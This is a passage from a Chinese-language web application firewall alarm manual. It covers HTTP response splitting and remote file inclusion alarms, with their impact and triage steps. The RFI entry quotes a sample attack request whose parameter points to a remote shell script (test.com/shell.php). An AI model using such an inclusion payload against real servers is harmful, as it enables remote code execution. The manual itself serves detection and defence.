HTTP请求中的URLBODY包含HTTP响应分割被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中的URLBODY包含HTTP响应分割。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

15. RFI攻击

·              告警解释

阻止参数包含远程文件包含攻击,防类似test.php?id=http://test.com/shell.php等特征串。

·              告警事例

GET /test.php?id=http://test.com/shell.php HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/xaml xml, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)

Accept-Encoding: gzip, deflate

Host: 192.168.27.165:8080

Cookie: ASPSESSIONIDAQBBBBAT=GHIJDFGBEBNOHJMFAOMBAHKN

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求中包含参数包含远程文件包含攻击,类似test.php?id=http://test.com/shell.php等特征串被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中包含参数包含远程文件包含攻击,类似test.php?id=http://test.com/shell.php等特征串。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

联系我们